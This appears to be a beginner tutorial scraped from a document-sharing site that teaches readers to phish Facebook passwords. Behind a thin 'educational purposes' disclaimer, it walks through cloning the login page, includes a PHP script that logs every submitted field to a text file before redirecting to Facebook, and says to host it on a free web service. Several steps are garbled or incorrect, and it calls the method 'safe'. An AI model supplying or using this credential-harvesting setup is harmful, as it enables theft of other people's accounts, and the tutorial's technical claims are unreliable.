11
How to hack For absolute beginners who have no knowledge of programming Hamza Shahid Mirza – Certified Ethical Hacker Please note that this tutorial is for educational purposes only. If you learn anything from it, please do not use it for malicious attacks or any other type of illegal activity. If you already to know how to hack using the real programming and hacking techniques then please don’t use them as you will get traced by the cyber security almost instantly and it can get you in a lot of trouble.

Hacking tutorial

Embed Size (px)

DESCRIPTION

A very basic tutorial on how to hack a profile. This is just for educational purposes and should not be used to attack someone.

Citation preview

Page 1: Hacking tutorial

How to hackFor absolute beginners who have no knowledge of programming

Hamza Shahid Mirza – Certified Ethical Hacker

Please note that this tutorial is for educational purposes only. If you learn anything from it, please do not use it for malicious attacks or any other type of illegal activity.

If you already to know how to hack using the real programming and hacking techniques then please don’t use them as you will get traced by the cyber security almost instantly and it can get you in a lot of trouble.

Page 2: Hacking tutorial

Introduction to hacking

Hacking is the art of exploiting computers to get access to otherwise unauthorised information. Now that the world is using IT systems to gather, store and manipulate important information there is also a need to make sure that data is secure. However, no system is without its problems.

Page 3: Hacking tutorial

Types of hackers

There are 3 types of hackers… White hat hackers, grey hat hackers and black hat hackers.

A white hat hacker breaks security for non-malicious reasons, perhaps to test their own security system or while working for a security company which makes security software. The term "white hat" in Internet slang refers to an ethical hacker.

A black hat hacker is a hacker who "violates computer security for little reason beyond maliciousness or for personal gain". Black hat hackers form the stereotypical, illegal hacking groups often portrayed in popular culture, and are "the epitome of all that the public fears in a computer criminal".[10] Black hat hackers break into secure networks to destroy data or make the network unusable for those who are authorized to use the network.A grey hat hacker is a combination of a black hat and a white hat hacker. A grey hat hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has a security defect, for example. They may then offer to correct the defect for a fee.

Page 4: Hacking tutorial

What will you learn here?

Here you will learn how to hack without having any knowledge of programming. In other words, you will learn to hack using “Phishing technique”.

Phishing is the method for hacking passwords. It makes the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites like Yahoo, Gmail, paypal, ebay and Facebook etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away.

It is a very basic technique and it doesn’t require any knowledge of programming. I’ve already written a code that you are going to need so just follow the steps and you’ll be able to call yourself a ‘hacker’.

Page 5: Hacking tutorial

So let’s get started…

Go to the normal facebook login page which is www.facebook.com

Right click on the page and click ‘View page source’.

Page 6: Hacking tutorial

This page will open in a new tab when you click ‘View page source’.

Page 7: Hacking tutorial

Press ‘Ctrl + A’ to select everything on the page and the ‘Ctrl + C’ to copy.

Page 8: Hacking tutorial

Open Notepad on your computer and paste the page that you copied by pressing ‘Ctrl + V’

Page 9: Hacking tutorial

Now click ‘Edit’ on the top left corner of the notepad and click the ‘Find’ option and the ‘Find box’ will open up. Type ‘action’ in the ‘Find what’ bar and click ‘Find next’ until you find “action = http://www.facebook.com/login.php?”. Now select ‘action’ and change it to ‘post’. So that’s what it should end up looking like: “post = = http://www.facebook.com/login.php?”.

Page 10: Hacking tutorial

When you’re done, save it as login.html.

Now open a new notepad file and type this code there:

<?phpheader ('Location:http://www.facebook.com');$handle = fopen("usernames.txt", "a");foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?

This is the hacking code that I’ve written. Save it as code.php.

Page 11: Hacking tutorial

Now the final step is to create a phishing website. Go to 000webhosting.com (ooo is 3 zero’s). And sign up by creating a create a subdomain. For example, www.mynewwebsite.com.

Now go to your file manage on the homepage on the website and upload the 2 files that you saved on your notepad. i.e. Login.html and code.php.

You must know the email address of the person you’re going to hack. Now try to login with their email address and leave the password section blank. Once you’ve done it, their email and passsword will be shown on your filemanager on the phishing website that you just created.

It’s a very basic and safe technique to hack someone’s profile. Hacking someone anonymously takes a lot of programming skills and time. So that’s why I’ve shown you this technique because a lot of people wonder ‘how to hack’.